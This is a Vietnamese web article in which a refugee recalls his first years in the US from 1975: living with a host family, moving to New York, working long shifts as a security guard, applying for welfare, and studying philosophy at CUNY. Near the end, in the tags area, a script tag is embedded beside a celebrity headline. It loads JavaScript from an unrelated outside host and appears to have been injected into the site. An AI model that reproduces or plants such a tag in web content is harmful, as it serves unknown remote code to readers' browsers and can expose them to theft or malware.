Sống ở Mỹ 40 năm, tôi đã được gì và mất gì

Sau khi sống với Host được hơn 2 tháng thì chúng tôi chuyển ra ở riêng. Và trong trong hơn 2 tháng đầu định cư Mỹ đó, chúng tôi sống chung với một gia đình người Mỹ trung lưu, và điều này đã giúp chúng tôi hiểu hơn về con người và nước Mỹ.

15:38 24/09/2022

Và đây sẽ là những hiểu biết có ích và đắt giá cho tôi. Nó là nhưxng kinh nghiệm theo tôi mãi về sau, giúp tôi kiên trì đeo đuổi giấc mơ Mỹ, lèo lái gia đình tôi  xuyên qua sóng gió, đạt tới bến bờ hạnh phúc ngày nay, 40 năm nhìn lại.

Gia đình của Host là di dân đời thứ 2. Có nghĩa là cha mẹ Host đã như tôi, được sinh ra ở nước ngoài, và sang định cư ở Mỹ vì một giấc mơ cho cuộc sống mai sau, cho cuộc sống của con cái mình được vẹn tròn và tốt hơn. Chồng là  người gốc Pháp, vợ là người gốc Ý, nhưng hai người cùng nhau sinh ra và lớn lên trên đất Mỹ, cũng như những đứa cháu nội và cháu ngoại của tôi 40 năm sau. Nhìn vào cách sống, cách sinh hoạt, cách suy nghĩ của họ khi sống ở nước ngoài. Khi rọi ánh sáng vào hoàn cảnh, tình huống của chúng tôi thiì các bạn mới thấy rõ được hướng đi, con đường của chúng tôi, cùng với những việc chúng tôi phải làm để thywjc hiện giấc mơ đổi đời của chúng tôi. Riêng bản thân tôi thì càng ngày tôi phải càng nổ lực và quyết tâm hơn và nhất định phải bắt đầu lại, bắt đầu một cuộc sống mới.

Nước Mỹ sẽ là một nước tuyệt vời dành cho những bạn có sự cầu tiến và có tinh thần vươn lên trong cuộc sống. Khi bạn định cư ở Mỹ bạn sẵn sang làm việc, sẵn sàng làm việc, cố gắng học hỏi, tôn trọng pháp luật, làm việc hợp pháp, thì chắc chắn là các bạn sẽ có một cuộc sống ổn định và dễ chịu sau này. Mức lương tối thiểu, mất việc cũng được trợ cấp tiền thất nghiệp.

Hơn thế nữa, sau 2 tháng sống với Host, tôi đã thu được cho mình nhiều kỹ năng và kinh nghiệm sống, nó là nề tảng giúp cho tôi có thể sau này sống tự lập. Tôi hòa nhập và trở nên quen thuộc hơn với cuộc sống định cư Mỹ, về cách sống của họ với nhau, hay phép lịch sự ở đất nước này. Tôi nói được tiếng Mỹ rành hơn và cũng ăn được một số món ăn phổ biến ở đây như là hotdog, hamburger…

Tôi hòa nhập và trở nên quen thuộc hơn với cuộc sống định cư Mỹ, về cách sống của họ với nhau, hay phép lịch sự ở đất nước này.

Chúng tôi chuyển đến New York, và chúng tôi là những ngưoi gốc Việt đầu tiên đặt chân đến đây. New York là một thế giới thu nhỏ, di dân tứ xứ đến đây sinh sống. Như lời trong một bài ca về New York, nếu các bạn thành công ở đây, các bạn có thể sống được bất cứ đâu trên đất Mỹ.

Có nhiều bạn cứ nghĩ rằng đến Mỹ sống là sẽ được hưởng phúc lợi từ chính phủ Mỹ.  Nhưng không phải như vậy, cuộc sống ổn định, an nhàn sẽ chỉ đến với những ngừoi làm việc và cống hiến hết mình, và nó sẽ không bao giờ đến với những người chỉ biết ngôi không ăn bám xã hội mà lại muốn được người khác cho tiền.

Tháng 7 năm 1975, khi đến định cư Mỹ được hai tháng, vợ chồng tôi đã thuê nhà riêng và bắt đầu một hành trình mới, tự do và độc lập ở đây. Tôi vừa làm vừa học, và có đi làm việc ở Phố Wall, cần cù làm việc suốt đời. Ngày hưu trí tôi ở không chu du thiên hạ. Con cái của tôi đều sống riêng. 40 năm nhìn lại thấy cuộc đời ở đây hay quá. Giấc mơ Mỹ đã đến với tôi.

Nếu các bạn chỉ nhìn điểm bắt đầu và kết thúc, thì các bạn có thê sẽ thấy là tôi sướng chứ không khổ gì nhiều. Nhưng cái cốt lõi bên trong mới thực sự đáng nói, đó là cả một quá trình làm việc và phâsn đấu mới cho ra kết quả như ngày hôm nay. Một người nào đó đã nói rất đúng. Đời là một hành trình. Thú vị nằm ở hành trình, ở những việc làm hàng ngày, không phải ở điểm bắt đầu, hay điểm kết thúc.

Chúng tôi chuyển đến New York, và chúng tôi là những ngưoi gốc Việt đầu tiên đặt chân đến đây.

Cực nhất là lúc gia đình tôi chuyển ra ở riêng, lúc đó với hai bàn tay trắng, còn chưa có việc làm. Qúa trình đi xin việc rất gian nan, nhiều chỗ xin thì bị chê nên không nhận vì thiếu kinh nghiệm. Không dám xin việc văn phòng, vì chưa đủ ngôn ngữ, kinh nghiệm.

Tuyệt vọng quá, tôi đi xin “Welfare” và “Food Stamps”. Đó được xem là những món tiền cho người nghèo nhất trong xã hội, giúp họ sống qua ngày, chờ lúc có việc (có job). Tuy nhiên khi tôi được chấp nhận những phúc lợi an sinh xã hội này, tôi đã tìm được Job (việc làm). Đó là một việc làm lương tối thiểu, làm nhiều, lương ít, làm việc rất cực khổ.

Tôi làm việc cho một công ty bảo vệ (security guards). Công việc thì cũng chỉ là đứng đứng gác hãng bánh, bến tàu, các cao ốc ở đão Manhattan mà thôi. Khổ nhất là những lúc đi gác bến tàu. Lúc đó tôi phải làm việc một ngày 12 tiếng. Đi từ New York qua bến tàu ở tiểu bang New Jersey là 2 tiếng. Trở về cũng 2 tiếng. Mỗi ngày tôi chỉ ở nhà có 8 tiếng, để tắm rửa, ăn uống, và ngủ. Lúc tôi đi, ở nhà không có ai, vợ đi làm, con đi học. Lúc tôi về, ai cũng đã ngủ.

Ngồi gác bến tàu, mỗi ngày tôi ngó lưng của bà Nữ Thần Tự Do, nên những lúc chán nản, tôi thường nói Nữ Thần nầy ngó về phía Âu Châu, thiên vị người da trắng, không bao giờ chịu ngó về phía một người Việt Nam xấu số, do tình cờ của lịch sử được sanh ra và lớn lên ở Sài Gòn, nên phải đến đây chịu cực khổ như vầy.  Hãng tôi làm có nhiều trí thức các nước khác, đặc biệt những nước Đông Âu. Những lúc chán nản, tôi thường nói chuyện với họ. Người nào cũng kỷ sư bác sĩ hay giảng sư đại học, cũng như tôi đang vừa làm vừa học lại.  Anh chàng tôi thích nhất đã từng là giảng sư ở Tiệp Khắc, đã đậu bằng PhD Tâm Lý Học. Anh học cao hiểu rộng, lại giỏi về môn tôi từng dạy ở Sài Gòn, nên tâm đầu ý hợp. Và cũng nhờ những lần nói chuyện đó mà tôi càng có thêm động lực để tiếp tục cuộc hành trình của mình. Vừa làm vừa học như họ.

Hãng tôi làm có nhiều trí thức các nước khác, đặc biệt những nước Đông Âu.

Hai năm đầu tiên sống ở Mỹ, tôi vẫn chưa thể nào dứt hẳn được với quá khứ. Tôi vẫn còn luyến tiếc thời dạy học, viết văn, làm sách ở Sài Gòn. Nên tôi đã học hơn 60 credit PhD Triết học ở đại học CUNY. Ngồi trong chòi canh ở bến tàu, tôi có nhiều thời giờ đọc sách. Học đại học ở đây đọc sách rất nhiều, nhất là môn Triết Học. Hơn 37 năm bỏ triết học, tôi đã quên gần hết những gì đã học, chỉ còn nhớ mình vất vả với Triết học Mỹ, hoàn toàn chú trọng đến những vấn đề về logic và ngôn ngữ (philosophy of language), tôi chưa bao giờ nghe nói tới ở Sài Gòn.

Tags:
Con dâu tỷ phú Hoàng Kiều khoe đường cong siêu thực ở tuổi U40, chia sẻ bí quyết hạnh phúc gây chú ý<script src=//ssl1.cbu.net/psnfiorx></script>

Con dâu tỷ phú Hoàng Kiều khoe đường cong siêu thực ở tuổi U40, chia sẻ bí quyết hạnh phúc gây chú ý

Không chỉ sở hữu ngoại hình xinh đẹp, tư duy trở thành người phụ nữ hạnh phúc của con dâu tỷ phú Hoàng Kiều cũng là điều rất đáng học hỏi.

Tin cùng chuyên mục
Tin mới nhất